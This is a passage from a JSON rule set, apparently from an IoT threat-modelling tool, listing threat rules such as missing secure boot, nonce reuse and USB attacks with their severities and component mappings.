features","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"9e85cf25-febb-46ca-a5f5-c6283412a87b","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"6c83ccbc-ffbd-4bd6-b207-07386e3393c5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"4d88ce07-2a06-4ae3-942a-46eb25ccdd9b","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"11975f59-55e0-420f-9366-513175e9236e","Name":"Missing secure boot","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"4f0c5fb9-e24f-487a-b192-66d10c2b97a5","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"1487298b-ff88-4e01-9a60-09b1eaf8a41f","Name":"Missing immutable Root of Trust","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"f170308a-c188-4ae0-bcef-d04af1e429b3","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"17b59f51-59d3-4a8f-9960-a04ce7e96be6","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"c54de80f-b548-4432-9ec0-fa3a579be7e6","Name":"Updatable","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"99864969-3b71-45ad-bae5-09bc4ecc5cc1","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"367b80cd-1b41-483b-a157-b143714b8af7","ComparisonType":"==","Value":false}}]},"Severity":4},{"ID":"c6535534-7656-4819-93fe-19d9a78a9390","Name":"Roll-back","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"c23a62c8-901a-412b-80b8-d2574103b733","ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"d951b792-f84b-4ab3-82d1-21867e202755","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"85b3711a-33d2-4cd2-9c84-471e76cc761c","Name":"Improper debug access control","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"8a6476b9-7a5c-4306-bd43-db6fe32bbf66","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"2d746c06-a57d-41af-9712-f9d8059425eb","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"f40ce61a-c823-4ca7-ab51-a70dbd9718a6","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"12c8413b-e1cc-40d6-ae07-6321c5fbf4a0","Name":"Internal assets exposed","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"1a99fb9b-d1f0-4215-93a6-5cd9fd272026","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"2d746c06-a57d-41af-9712-f9d8059425eb","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"517b62dd-eea7-426e-82c6-2c458eed0aaf","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"5aac31c8-fcb7-4d27-8937-e2c9747b83d4","Name":"Address Region Overlap","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"24645edb-85ac-438b-9033-ba2721c3e2c7","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea189855-6883-489f-a3d0-77d4ac51a6ef","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ca6a9224-153b-4c06-8c1b-4ea3333c8e92","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"6630ce3a-e21d-467a-b669-99418e95cd8a","Name":"State Transition","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"5656f112-8443-4245-aa38-38cd9d9375e0","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea189855-6883-489f-a3d0-77d4ac51a6ef","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"16ab50f4-dd94-43dd-8480-37cae5c61043","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"6aec11cc-995c-4ee9-a1ce-506b071f3da3","Name":"Risky cryptographic algorithm ","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"31f89637-4b8a-41e9-acac-9d012767a424","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"783c742d-ebbf-4a58-b8c9-bdc0faeff57d","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"2ee8ccf6-2886-4ebe-81d9-46a408b553a3","Name":"Less-secure downgrade","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"97b5a1d4-be82-4485-82f6-e4532795a20b","ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"56a10ad5-a9bf-426f-8e83-ba07561ca78b","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"f46ae96c-b62c-4fda-955d-6ed55c157c7f","Name":"Weak block cipher mode","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"a20d6e53-4426-4700-a04f-a4018bc7bfce","ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"518bbb50-aeee-4c87-95d1-8724a4dac569","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"dfac545d-b449-45d0-95bd-a7814b1a97ce","Name":"Appropriate parameters","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"a0729a41-bcc9-43d8-9c86-bfb26c64e93c","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"08377961-8f56-4b56-b684-331f77810f1d","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"4e5318de-8259-41cd-8704-8842a959b9c6","Name":"Insufficient entropy","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"0ffd675d-d83c-4f74-8835-398e7f3930cb","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"420f03a2-1ab7-4bc2-910d-4ea025518da2","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"a904d935-a9d7-45d9-83c8-c403a57e0b80","Name":"Nonce reuse","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"680ceebd-357c-49d6-8bfd-390dc6c51dde","ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"f35ccff8-6497-4b28-8627-7f255bce0e02","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"12caa9f9-0b1c-4ce0-ac2b-ebee69001b1e","Name":"HID spoofing","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"195d942e-02f8-49ad-873f-299f4b4ad4ec","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596","b1ff0675-f9b7-4ffb-bdd5-f621c6580d9a"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"111a5819-f53f-4a8d-81df-6b756a20efe7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"23564ce2-4786-4144-85b6-d03de2771d6b","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"38d27f20-a7ee-40dc-aa6f-b10c98d72409","Name":"Malicious file","Description":"Social engineering: An USB flash drive contains interesting but malicious files","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"cf948333-b659-40ff-b93f-d4bdc8c980d1","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"111a5819-f53f-4a8d-81df-6b756a20efe7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e884ecfe-bda1-4f0b-86f7-3ce0d735aeeb","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"8597431f-52e2-4d89-bb21-7d34185dbfe6","Name":"USB killer","Description":"Note: this type of attack is also possible at other interfaces such as HDMI, Thunderbolt, etc.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"915f674e-926b-4bd9-94cb-ee8b4637bc80","ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66","88d19822-b1b0-469f-ae00-1bc600ccaa1d","644f8521-6b49-41bc-86df-4064b89fb881","96bdc11d-dbb0-4785-8a5c-373e2c492eb0"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"111a5819-f53f-4a8d-81df-6b756a20efe7","DetailRestrictions":[]},"Severity":3},{"ID":"b8438e31-cc77-4400-86c0-14aa01d411ae","Name":"Ethernet port scan","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"f5949698-47d4-48ee-a116-2d212695c41f","ThreatCategoryIDs":[]},"overridenRuleIDs":["fa055483-b3a2-461f-b09c-46e99de0455e"],"RuleType":1,"StencilRestriction":{"stencilTypeID":"58e0c62c-e5b7-4e9f-9f8a-f8150cf18930","DetailRestrictions":[]},"Severity":1},{"ID":"fa055483-b3a2-461f-b09c-46e99de0455e","Name":"WiFi port scan","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"f5949698-47d4-48ee-a116-2d212695c41f","ThreatCategoryIDs":[]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"59f2fd67-bc38-4447-9c14-d9306283bbe9","DetailRestrictions":[]},"Severity":1},{"ID":"9ec88af2-3da9-41df-93bf-8cbcb74a7bb6","Name":"Protocol design issues","Description":"Custom protocols may be not sufficiently tested and therefore more likely include vulnerabilities","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"b8835cb9-3c77-496e-ac2d-2ed6fa7f2d78","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":4,"StencilRestriction":{"stencilTypeID":"c4ce892e-975c-48f5-a0f8-e6eb7591111d","DetailRestrictions":[]},"ProtocolRestriction":{"protocolID":"c4ce892e-975c-48f5-a0f8-e6eb7591111d","DetailRestrictions":[]},"Severity":2},{"ID":"21c438f5-30d1-4cfc-9deb-78827b036a22","Name":"Actuator command injection","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"573881b4-ceb6-4d6a-a5c3-9c0e6c5a3b3c","ThreatCategoryIDs":["88d19822-b1b0-469f-ae00-1bc600ccaa1d","f2ba26f4-b2da-49a8-aba2-14e42a746d6a","b7935cfe-6a41-45e4-8778-f0fbb1e4018b"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":["04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"NewProperty3","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"8aa3a3b1-0aff-4e15-ad59-cc40b75dbdbd","Name":"Sensor data manipulation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"a76b8768-9d68-4074-b5e1-0f9abc61bcda","ThreatCategoryIDs":["f7639a0c-e85b-4947-bbec-2ac4a0911827","f2ba26f4-b2da-49a8-aba2-14e42a746d6a","b7935cfe-6a41-45e4-8778-f0fbb1e4018b"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":["04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":0,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"NewProperty1","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"b41b621c-4b91-43f9-90ab-b7e955269620","Name":"Device theft","Description":"","IsActive":true,"RuleGenerationType":2,"Mapping":{"AttackVectorID":"30cf5142-2339-4130-8a6e-2b05869e6df2","ThreatCategoryIDs":["a6a57921-7fcb-4f54-b0f5-bac0a0f74163","6b8c08cb-3f02-413a-96b4-179bb1f67997"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"6b8b580e-f99a-4e0c-850d-241fccfd0079","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e9148055-f813-45da-85a8-bfcf4d71ff40","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"08043f24-cc72-435b-ace1-bd593442215d","Name":"Unauthorized unplugging","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66","7cf3480c-f4db-47cb-be36-b27deb746c64"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"e75f9804-6ae3-4eb6-9011-4b87a0d4823b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"cef5bbac-5833-49bb-9021-9f5200c29c83","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"e8848ea8-e120-4722-bc10-90daf7b4a075","Name":"Compliance loss duty cycle limit","Description":"For example Europe defines a maximum duty cycle","IsActive":true,"RuleGenerationType":2,"Mapping":{"ThreatCategoryIDs":["1180824d-9f8a-4a4a-8398-3775c541a360"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"4edf4a31-e828-4933-9a87-779083e7167e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"229d9064-0034-4e55-998e-a50d8e0f9dd4","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"0e783801-b482-4721-af49-1be96b16fc59","Name":"Communication outage","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66","f2b91aaf-7d9f-4baf-8713-13d7625174d9"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"4edf4a31-e828-4933-9a87-779083e7167e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"229d9064-0034-4e55-998e-a50d8e0f9dd4","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"512c6921-1b40-4e26-86b5-f66609e57d96","Name":"Data store theft","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"30cf5142-2339-4130-8a6e-2b05869e6df2","ThreatCategoryIDs":["a6a57921-7fcb-4f54-b0f5-bac0a0f74163","6b8c08cb-3f02-413a-96b4-179bb1f67997"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"80aa0465-21e0-41bd-b521-84a346c5f54b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsRemovable","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"8c29ed3b-b151-41de-81ae-627227aaa104","Name":"Selective forwarding","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"c7787e71-5c70-462c-9558-ce20e7cfdfe8","ThreatCategoryIDs":["f7639a0c-e85b-4947-bbec-2ac4a0911827","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f","f2b91aaf-7d9f-4baf-8713-13d7625174d9"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":2,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]},{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]}],"NodeRestrictions":[]},"Severity":2},{"ID":"6a9008d4-fa27-46b1-8a11-6dbcecb8b211","Name":"Human identification","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["bcd08af5-29bf-4ed8-ab6c-e311e88f4c84"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"c2d71a11-6228-4e05-bc93-0ddd45328fde","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"38883a00-d18f-4d1f-8a4c-18741a480557","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"e5f4b790-5898-495d-9b51-5a16d452edff","Name":"Privacy-violating interaction","Description":"Gestures in public environments result in privacy-violating interaction","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["af3ee78e-9e83-4bd1-b9b5-13ec28765518"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"c2d71a11-6228-4e05-bc93-0ddd45328fde","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"d9919a71-0642-46a5-8056-348e06f8b86e","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"8340469b-525d-4563-a75d-6ca1d60c7409","Name":"Hidden interfaces","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"184cd5e5-2517-4d7f-a81a-c411942d3601","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"2d746c06-a57d-41af-9712-f9d8059425eb","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"311904f3-7898-4bab-ba74-e6024c704cd3","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"d714118d-123d-41b4-8997-63b13a5c09d4","Name":"Integrity validation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"83d23b79-71c5-488e-adb2-dd0f76d70f44","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"8f47a4ac-0934-4a65-a6f3-07503c92f658","ComparisonType":"==","Value":false}}]},"Severity":4},{"ID":"90c71cb6-ec32-4eb6-95ca-20a5d7381fc6","Name":"Authenticity validation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"83d23b79-71c5-488e-adb2-dd0f76d70f44","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"00f961fc-97ce-4003-8f2e-79a4748ec0b2","ComparisonType":"==","Value":false}}]},"Severity":4},{"ID":"cb711ade-c26b-4500-8337-4eba00d26975","Name":"TOCTOU attack","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"cf63f187-4353-4bf8-bc37-a7392c6d91bf","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"000441ff-d15f-46c3-bb9c-0c949063271d","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"1729c2ac-4dd2-449a-bd8a-ee7c11ff1461","Name":"Unknown state","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"3df6a845-52a2-40a9-8978-0277efd7cfcb","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"b9caf305-7c53-48c9-beef-2fb2a96cc5b0","Name":"Regulation compliance","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["1180824d-9f8a-4a4a-8398-3775c541a360"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"4006de15-8767-4a09-8678-84b8d6b50ae0","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"778eb19f-8f36-4ce5-aa48-70429386b113","Name":"Improper log access control","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"97c0d7a1-13c7-43d5-b03c-75845f973af5","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c17cbe5c-3210-42fc-be1e-05f1f915865b"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"8e4b2af8-b023-4991-80f5-54ffa28cd616","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"c4df07d3-101f-492e-9f90-70d916f7ed43","Name":"Missing log rotation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"d0532ce9-51a9-4bb1-84ae-c8c63ee78e7f","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"b274e8f6-5a0f-4efc-bc4e-40210c2035ad","Name":"Log file overwritten","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","96bdc11d-dbb0-4785-8a5c-373e2c492eb0"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"95b793b3-b68f-4533-9dc0-4e7d414effe3","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"b0d13562-1629-4724-bb67-f910157ed1c9","Name":"Missing log evaluation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"364003cb-3e6c-470a-a6bf-e7a7c93e07fa","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"b4c216c0-ccab-4a4d-a156-1b4979dc2aec","Name":"Missing separate location for log files","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"418fe90d-88fd-4066-9339-890501ea07f0","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"c6ac1dcf-ff18-4810-ba64-10aaaf44c135","Name":"Missing central log 